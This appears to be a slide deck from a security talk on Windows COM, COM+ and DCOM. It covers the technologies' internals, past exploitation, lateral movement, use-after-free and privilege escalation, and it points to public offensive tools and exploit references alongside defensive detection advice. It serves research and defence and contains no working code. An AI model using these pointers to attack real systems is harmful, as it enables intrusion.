  • 16. COM BACKGROUND: COM+ ▸ COM+ meant to solve the problems in COM like: ▸ Quickly implement common configurations for COM components like security boundaries ▸ Load DLLs into processes on demand ▸ Managed methods to manage COM components ▸ Multi-pass… err.. threading ▸ Slick GUI https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
  • 17. COM BACKGROUND: COM+ ▸ COM+ also came with rad icons in the GUI ▸ Demo! https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
  • 18. COM BACKGROUND: DCOM ▸ DCOM is “Distributed COM” ▸ “Helps you” in COM and COM+ with distributed transactions ▸ Slings COM object data typically with RPC ▸ Likes to make assumptions you know what you’re doing with security and marshaling data ▸ James Forshaw and Matt Nelson have been finding problems with Windows and apps marshaling data ▸ DCOM lateral movement script (enigma0x3)
 https://github.com/rvrsh3ll/Misc-Powershell-Scripts/ blob/master/Invoke-DCOM.ps1
  • 19. COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS) ▸ .NET can work with COM for interoperability ▸ “The Runtime Callable Wrapper (RCW) is a mechanism that promotes transparent communication between COM and the managed programming model.” https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
  • 20. COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS ▸ This is what PowerShell uses to call into COM objects https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/ ComInterop/ComObject.cs
  • 21. COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS) ▸ COM can work with .Net thru COM Callable Wrappers ▸ “When a COM client calls a .NET object, the common language runtime creates the managed object and a COM callable wrapper (CCW) for the object. Unable to reference a .NET object directly, COM clients use the CCW as a proxy for the managed object.” https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
  • 22. COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC ▸ James Forshaw talked about .Net and COM interoperability at DerbyCon 2017 ▸ IronGeek Link: ig2.me/pZ
  • 23. COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW ▸ To dig in more, you’re going to have to know C, C++ https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
  • 24. COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL ▸ QueryInterface is how you query… for interfaces ▸ This is how you figure out what interfaces are available to you ▸ AddRef / Release may be important to you eventually ▸ Important if you want to partake in bug bounties :) ▸ This dictates the object lifetime by reference count ▸ Abusing the reference count introduces other avenues of attack (cough Use After Free) ▸ If open redirects are still around, we should fix those first
 https://blog.zsec.uk/cve-2017-3528/
  • 25. COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE ▸ Raymond Chen talked about this in 2004
 
 
 ▸ Exploit DB has stuff on AddRef being misused https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903 https://www.exploit-db.com/exploits/41042/
  • 26. COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS ▸ Microsoft is still fixing COM related issues ▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far ▸ Researched by Haifei Li, Mark Dowd, James Forshaw ▸ Links posted on https://vivirytech.blogspot.com ▸ COM has a reoccurring theme at conferences forgotten/“rediscovered”, but still broke (lulz) ▸ Kinda like Adobe issues, right?
  • 27. COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED? ▸ How is COM exploited? ▸ UACMe
 
 ▸ James Forshaw
 
 ▸ Casey Smith
 
 ▸ Matt Nelson
  • 28. COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE! ▸ Microsoft Process Explorer ▸ Find medium to high integrity attack paths ▸ ReactOS ▸ James Forshaw OleViewDotNet (github.com/tyranid/oleviewdotnet) ▸ See the COM goodies in Windows ▸ Find new unexplored attack COM paths!
  • 29. WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM ▸ Holy attack surface Batman! Thanks OleViewDotNet! ▸ 3,592 ways to see if you can discover a new attack path
  • 30. WHAT HAPPENS WHEN I PRESS THIS BUTTON? ▸ Hey kid, wanna crash something? (this can peg your CPU) ▸ Watch with Process Monitor for potential attack paths
 https://github.com/FuzzySecurity/DefCon25 fondue.exe may be a privilege escalation path
  • 31. WE NEED THE BLUE TEAM, AND THEY NEED US ▸ There’s a lot of fun things that leverage COM ▸ ZeroSum’s Koadic: COM C&C ▸ MITRE’s ATT&CK framework ▸ @SubTee tweets (seriously) ▸ We need to use their research to our gain ▸ Run things like Squiblydoo to see EDR response ▸ Work with the product groups and blue team ▸ See how these products trigger IOCs and act
  • 32. BLUE TEAM FUN! ▸ Are you running Windows 10 RS4 / Windows Server 2016? ▸ SpecterOps Device Guard configs / guide ▸ Are you doing PowerShell cmdline audit AND reviewing? ▸ Users probably don’t run PowerShell, if they do, use v5+ ▸ Pick up on keywords like, “-COMObject” ▸ Do you really need wscript and cscript enabled? ▸ It can be done, ask @fpieces, he’s done it ▸ Deters attacks leveraging DotNetToJScript ▸ Investigate the potential of SysMon and Project VAST
  • 33. ITS ALMOST TIME TO GO, LETS REVIEW QUICKLY ▸ COM is everywhere as it was ~20 years ago ▸ Lots of things not covered like “TreatAs” and monikers ▸ Many “exploits” are just abusing design decisions ▸ More research and community made tools will (most likely) bring to light more COM exploits and wreckage ▸ Other organizations also add their own COM objects ▸ Sad face:
  • 34. LEARN MORE AND CONTACT ME BELOW ▸ For more info about COM: ▸ https://vivirytech.blogspot.com ▸ @maendarb ▸ Slack: https://omasec.herokuapp.com